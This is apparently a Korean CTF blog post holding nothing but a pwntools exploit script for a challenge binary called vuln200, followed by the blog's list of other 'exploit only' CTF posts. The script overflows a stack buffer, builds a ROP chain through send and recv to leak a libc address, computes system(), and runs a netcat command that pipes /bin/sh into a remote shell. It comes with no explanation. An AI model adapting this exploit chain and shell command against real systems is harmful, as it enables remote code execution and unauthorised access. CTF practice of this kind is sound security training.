from pwn import *
elf = ELF('/usr/local/src/pwn/vuln200/vuln200')
recv_plt,send_plt = elf.plt['recv'], elf.plt['send']
recv_got,send_got = elf.got['recv'], elf.got['send']
ppppr = 0x080493AC
vuln = 0x08048EEB
conn = remote("localhost", 7777)
bss = 0x0804B0E0
payload = "write"
payload += "A" * 236
payload += "AAAA"
payload += p32(send_plt) # ret
payload += p32(ppppr) # argv1
payload += p32(4) # fd
payload += p32(send_got) # argv 2
payload += p32(4)
payload += p32(0)
payload += p32(recv_plt)
payload += p32(ppppr)
payload += p32(4)
payload += p32(bss)
payload += p32(0x190)
payload += p32(0)
payload += p32(vuln)
payload += "AAAA"
payload += p32(bss)
payload += p32(4)
payload += p32(0x190)
conn.send(payload + "\n")
print conn.recvuntil("Return to the main\n")
send_addr = u32(conn.recv(4))
system_send = 0x00040310 - 0x000ED7F0
system_addr = send_addr + system_send
print "system_addr : " + hex(system_addr)
cmd = "nc localhost 12348 | /bin/sh | nc localhost 12349"
bss = 0x080510E0
payload2 = "write"
payload2 += "A" * 236
payload2 += "AAAA"
payload2 += p32(recv_plt)
payload2 += p32(ppppr)
payload2 += p32(4)
payload2 += p32(bss)
payload2 += p32(len(cmd))
payload2 += p32(0)
payload2 += p32(system_addr)
payload2 += "AAAA"
payload2 += p32(bss)
sleep(0.3)
conn.send(payload2 + "\n")
sleep(0.3)
conn.send(cmd)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
'CTF' 카테고리의 다른 글
2016 Layer7 CTF easy_fsb exploit only (0) | 2016.09.06 |
---|---|
2016 Layer7 CTF easy_bof exploit only (0) | 2016.09.06 |
angry_doraemon exploit only from pwntools (0) | 2016.08.28 |
codegate nuclear pwn tools 사용 (0) | 2016.08.21 |
DEFCON 2016 easy-prasky (0) | 2016.06.06 |